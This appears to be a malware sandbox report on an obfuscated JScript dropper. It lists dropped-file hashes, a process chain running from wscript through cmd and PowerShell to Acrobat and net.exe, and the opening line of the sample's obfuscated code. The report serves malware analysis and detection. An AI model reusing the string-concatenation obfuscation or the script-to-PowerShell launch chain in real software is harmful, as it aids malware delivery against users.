SSDEEP: | 6:YEQXJ2HXJMTHvqZbcuWmSg1c2LjcWkHvR0Y3oAvJfbPtdPeUkwRe9:YvXKXkqpT5LjIP0GDV8Ukee9 |
MD5: | 9F8271416EE775BF1B2D788A139CEAE8 |
SHA1: | 8BAB5EBB4AFDA46D70BB345DF69D9C77B0DD949E |
SHA-256: | B3B989DC5F29CA98632F15C51226A8C3BD381E9B3F9E1A9B548EB894AFC7C9D2 |
SHA-512: | BB41A51D4CB4FEA5992AFDA2BD70E093F9FDB8213F1EA9B40B1423D5FF5D7101C135964CA25B1342A64C85DA4CC50AB2DFC317B1B6673C096734D93F2767F366 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.298210846909452 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJMTHvqZbcuWmSg1c2LjcWkHvR0Y3oAvJf21rPeUkwRe9:YvXKXkqpT5LjIP0G+16Ukee9 |
MD5: | 52EEB9B612B23886A5C1A629BDCB3130 |
SHA1: | 8E88C2BAF009B33564308EDDEE118CA97269B9C6 |
SHA-256: | 89AE6A645CF9F70B1ACE5C61DB6E4734D9F7B3CD42EFBCB07AFE93B7E4F9E90D |
SHA-512: | AB6656EC6854662B3605A26F8DB94491A52443B0A420535177F53386913B2E77A442CABD3D2E200831D35290872C0387580A9001EA48A3889A99550D22D0AE80 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.670306127726169 |
Encrypted: | false |
SSDEEP: | 24:Yv6XkqpT5XIZamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSM2:YvuXWBgkDMUJUAh8cvMM2 |
MD5: | E113D18722A48F9E4529D9B2434BC4E0 |
SHA1: | 07A69F9D7FE9341BCA5003C7F4B7D19B422D6F66 |
SHA-256: | 62941F1339931A568519BC2299F67836B2B75EECE44DF120D2D15C4559491886 |
SHA-512: | 454736CFD3D07930E19F6788A719742C0E3BE47C9F580B84175A0B3739158344A4A0D5314F36B68E1D67D056287EF8F2AD4274BEC7CC8BCE7AF834F1E71D4494 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.272622687858875 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJMTHvqZbcuWmSg1c2LjcWkHvR0Y3oAvJfshHHrPeUkwRe9:YvXKXkqpT5LjIP0GUUUkee9 |
MD5: | 370B5EE42BA5FB24C9B72D17362B413C |
SHA1: | 9632F0CFAF80AFB05288E30DC03D1DD291AE5544 |
SHA-256: | 4B10A235F55CD3EDB50C3F8033201C0EF8CAE632C6C2F58E4C8DB8597274DFCC |
SHA-512: | D02705F5225FCE0B7BC2F7FDE5A59767DB1062195F20B34D5C698DBDE0797041095B626AD8BCDED8CD39A5DEEF1C327250DC2370827CFED6FB13493B8F198CBF |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.277793894373539 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJMTHvqZbcuWmSg1c2LjcWkHvR0Y3oAvJTqgFCrPeUkwRe9:YvXKXkqpT5LjIP0GTq16Ukee9 |
MD5: | 736E927C579F3035385F296C8DDD5ED9 |
SHA1: | 277EFFEEF9CB70EC434D7DFE680F30D70B7285ED |
SHA-256: | E2008C71392A8907877D7F78D979FA8AD242F313EECB79D0FC2BECDFB973DC36 |
SHA-512: | 1EE519BE53CE04817F16DFC21283CC5EAA3FEBD22B243E1542962217B6110ECFF8C339CA6822DDD676FC77235AEF74300AEBBF092E610802590AB0BC5076ADEA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.142506283714385 |
Encrypted: | false |
SSDEEP: | 24:Y716apvQayeTKU/ok6nS6zmjjKj0S6Wq2ntW2LS0C2B2SIyXMKXk5w9iuR6OG:Y7jT/B6nSdjs84tWyjFIdZe9xe |
MD5: | 06C0278AF3D108A67B3DE1FEA9D35899 |
SHA1: | F56B678A538585322B84E8FD4BB951FD5BC0AF8B |
SHA-256: | 178A2EDF75E7B4730E3001BAF29AE29CC10AB63D3FE6F0BCCA8775B168D8CF4D |
SHA-512: | 36F8C742FCB23A3C35D54BB8864CCF1CAC763AE6EE70D65C8BF88E85BE006BE469361C98DB8573691CA2DB18F6DD02D899C50C9330CD0D1870E46060C136D723 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.365940836363919 |
Encrypted: | false |
SSDEEP: | 24:TLBx/XYKQvGJF7urs9S6bqyKn6ylSTofcNqDuy47AZPFXKdqEKfS8EKfM1ba647k:Tll2GL7msMcKTlS8fcsuPWPCfIHWPv |
MD5: | 192F10E9B4895FDB897ED42AE77A37AE |
SHA1: | 065CBE568E15819D4EF71D374FC46C73B24013C7 |
SHA-256: | AD7001B89F4E4E1172D42F7084D1E5A901C51AD578358FB84089CB05CBA1D68C |
SHA-512: | 2D2F63A6B9D7A8718E4167B4AB765445A6E33C912854D4255C151E808426695A1BD8BFA511895FE67E2F5E85FF6714CB07D819253595E421513A2AF82F913164 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.8438427203898298 |
Encrypted: | false |
SSDEEP: | 24:7+tHZ6bqyKn6ylSTofcNqDuy47AZPF+KdqEKfS8EKfM1banbqXqLKufx/XYKQvGE:7M5cKTlS8fcsuPWP3fIuqGufl2GL7msg |
MD5: | 2BB758F6F80F1172FF2DF4EE6B61739C |
SHA1: | EB176F441D5A1BE128492EEB8CACC1F577908874 |
SHA-256: | 615A941BCE3153A6FD1C828C6B62A64675F5DC93AA33454CFCF731F788F885C2 |
SHA-512: | F848B5197459F7190C2E68370274CB64BC362E75367141F27D5B94DC0592B29CA619207D634C0C148F88E09D634DA08297228C532FE8974AB4463A2BA26707A6 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgxI5Rr3as2reTMYOy/4XFhmiNYyu:6a6TZ44ADExIisUOM8/4XFXK |
MD5: | 7626EB45590D1850A6B0E52248DAABEF |
SHA1: | C775C42ECFA047F0F7FC41A0BFE453DB1B591931 |
SHA-256: | 4A3C553A12681EFF61D60C572EF0E44555ED299CF7FFAE0AF76A692E604FABB8 |
SHA-512: | 17858480454E60616BE3535FC9A1805DB522B64054F508323FB830A91DD32F587A4E0A5835A309DEECA5C0A3E9DFD9E32852F506F02DAC2B2DCD2C095DAD856F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1628158735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllul5mxllp:NllU4x/ |
MD5: | 3A925CB766CE4286E251C26E90B55CE8 |
SHA1: | 3FA8EE6E901101A4661723B94D6C9309E281BD28 |
SHA-256: | 4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8 |
SHA-512: | F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.524398495091119 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClErz:Qw946cPbiOxDlbYnuRK+bDrz |
MD5: | 0B380A8B58F2B684B679936209B4904A |
SHA1: | 3DD3DB53835A3E2D02C1876CCD890D84EC564B3E |
SHA-256: | 19B13C0F45D10D9090B38B13A532F1C085A45DEE4625D5679E5BE977286B8731 |
SHA-512: | 585DF1840EDA5AA491702AA186DFCFB731ABC435E8F7251FF17CD4D0BFB0BE4679DA3FCBBF6F0F9B90A3AF7052945DA99168CC74F585C28EC34C60EA72524BA4 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 13-49-18-797.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.330589339471305 |
Encrypted: | false |
SSDEEP: | 384:usQfQQjZyDzISMjg0svDBjA49Y0/sQHpMVhrSWD0Wny6WxIWd44mJmtaEKHvMMwh:Ink |
MD5: | 5BC0A308794F062FEC40F3016568DF9F |
SHA1: | 14149448191AB45E99011CBBEF39F2A9A03A0D15 |
SHA-256: | 00D910C49F2885F6810F4019A916EFA52F12881CBF1525853D0C184E1B796473 |
SHA-512: | CF12E0787C1C2A129BE61C4572CF8A28FC48039B2ADFD1816E58078D8DD900771442F210C545AD9B3F4EAEC23F6F1480F7BBF262B6A631160B20D0785BC17242 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15099 |
Entropy (8bit): | 5.384625912878215 |
Encrypted: | false |
SSDEEP: | 384:90QZojayCm9VHPN1Ef5m1fDyK9eCyNtEKZp9XPfKmGixrKb+G3/jeJeLmpP2J4Qe:Ojw |
MD5: | 3138B49590220D2FD33422BCF750D2C9 |
SHA1: | EEB87B64E8503385F03B88E92556506579E19794 |
SHA-256: | A3C8162CD7E42AC41F9F53C0E30DB589176EEE4D18953575F49E7E6C311C76ED |
SHA-512: | A38B1666F478814E29B220E3742F93D6B01F60238570B4268E152B6B3B4E2B77EBB2CF5CF30E8FA94DF00D3516C5117FA255CE442865D20BD55CA6F53E817F7A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.384853530948299 |
Encrypted: | false |
SSDEEP: | 192:icbENIn5cbqlcbgIpLcbJcb4I5jcbKcbQIrxcbmngcbRwIkAd3cbZ:8qnXopZ50rr7tkAdU |
MD5: | 8C013ED16CB3B0FAD351D05697EC13CE |
SHA1: | 9EC1873AC5EE62CE5898D1FDC72922D66B10CC8B |
SHA-256: | 0A7CEEB94F81D97A248FFFE89C71AF7F184EF468A37BA3A3BD034960033DF71A |
SHA-512: | 267267DA13A328C817D3B85173DCE0AF8A562E936250BD1B9D800B77691BD95BBC2377DDD93DDC082CD874E5AEE2846B137FCCFDC59AD0D0666DE1CFCA29AF0C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo |
MD5: | A0CFC77914D9BFBDD8BC1B1154A7B364 |
SHA1: | 54962BFDF3797C95DC2A4C8B29E873743811AD30 |
SHA-256: | 81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685 |
SHA-512: | 74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/xA7owWLkwYIGNPMGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLkwZGuGZn3mlind9i4ufFXpAXkru |
MD5: | CA6B0D9F8DDC295DACE8157B69CA7CF6 |
SHA1: | 6299B4A49AB28786E7BF75E1481D8011E6022AF4 |
SHA-256: | A933C727CE6547310A0D7DAD8704B0F16DB90E024218ACE2C39E46B8329409C7 |
SHA-512: | 9F150CDA866D433BD595F23124E369D2B797A0CA76A69BA98D30DF462F0A95D13E3B0834887B5CD2A032A55161A0DC8BB30C16AA89663939D6DCF83FAC056D34 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.922654543339534 |
TrID: | |
File name: | 7893194593206114961.js |
File size: | 23'158 bytes |
MD5: | c84d685917550903c434159f4f0d2c19 |
SHA1: | 729d0bfbbced9c4281b3ff6df412a990d8479717 |
SHA256: | fdf2a386e69dab85c55085c8e8c657a60b99d1308819289322b69474a5b21a04 |
SHA512: | 3d421539c038a559cecb7b76da907fc33d8345ae3403be9bbfa613d72fe7b61f5678b283db0829e4ccebd3a2d594718f8a4540df1030162e5c6d12eada57ac4d |
SSDEEP: | 384:PfceFwwyege9tX6fOysd1MEuqmfZFPg2AQjXlvoGx+dg61lAJ5VlOBXZjyWCVPgn:5XNbKfRsd1MEuqmfZFPg2AQjXlvoGx12 |
TLSH: | C7A2A615EB02BE4D8AF9ACA9744A18F0326D110D45A450AD0CC62E9DA7E7FB1F5D30F7 |
File Content Preview: | function mvjzrp(){peeduwseh=[1031,3079,5127,4103,2055,3072];var gwksz=this[nkdevnmzx+dcosqo+zwzxtoky+gpdcipz+csplmbzue+qgllcy+hqkej+ujvohztff](this[sutaji+ulvnf+itnsguiu+zwzxtoky+tgodpkavb+nkdevnmzx+ujvohztff][suynkw+zwzxtoky+csplmbzue+dcosqo+ujvohztff+cs |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 1 |
Start time: | 13:49:06 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff69c8e0000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 13:49:06 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff79c120000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 13:49:06 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70f010000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 13:49:06 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff760310000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 13:49:15 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6153b0000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 13:49:15 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff79c120000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 13:49:15 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7ad7c0000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 13:49:15 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff61f300000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 13:49:16 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff77afe0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 13:49:16 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff61f300000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function mvjzrp() { |
|
1 | peeduwseh = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var gwksz = this[nkdevnmzx + dcosqo + zwzxtoky + gpdcipz + csplmbzue + qgllcy + hqkej + ujvohztff] ( this[sutaji + ulvnf + itnsguiu + zwzxtoky + tgodpkavb + nkdevnmzx + ujvohztff][suynkw + zwzxtoky + csplmbzue + dcosqo + ujvohztff + csplmbzue + ohfpy + jwpdfp + sjykeawzx + csplmbzue + itnsguiu + ujvohztff] ( sutaji + ulvnf + itnsguiu + zwzxtoky + tgodpkavb + nkdevnmzx + ujvohztff + tqpdpkrxg + ulvnf + rcblyiku + csplmbzue + uvtawcwex + uvtawcwex ) [jtzfygyyy + csplmbzue + vfqkxqvwu + jtzfygyyy + csplmbzue + dcosqo + krnhpe] ( pchrmhktt + stnkigbd + nkhbhdqtz + inrxfjri + otdebqcfm + suynkw + amxtw + jtzfygyyy + jtzfygyyy + nkhbhdqtz + kreyd + uaqcx + otdebqcfm + amxtw + ulvnf + nkhbhdqtz + jtzfygyyy + lsllbqf + suynkw + qnimrezt + hqkej + ujvohztff + zwzxtoky + qnimrezt + uvtawcwex + uzmyj + qicyuol + dcosqo + hqkej + csplmbzue + uvtawcwex + lsllbqf + qgllcy + hqkej + ujvohztff + csplmbzue + zwzxtoky + hqkej + dcosqo + ujvohztff + tgodpkavb + qnimrezt + hqkej + dcosqo + uvtawcwex + lsllbqf + vbmkv + qnimrezt + itnsguiu + dcosqo + uvtawcwex + csplmbzue ), 16 ); |
|
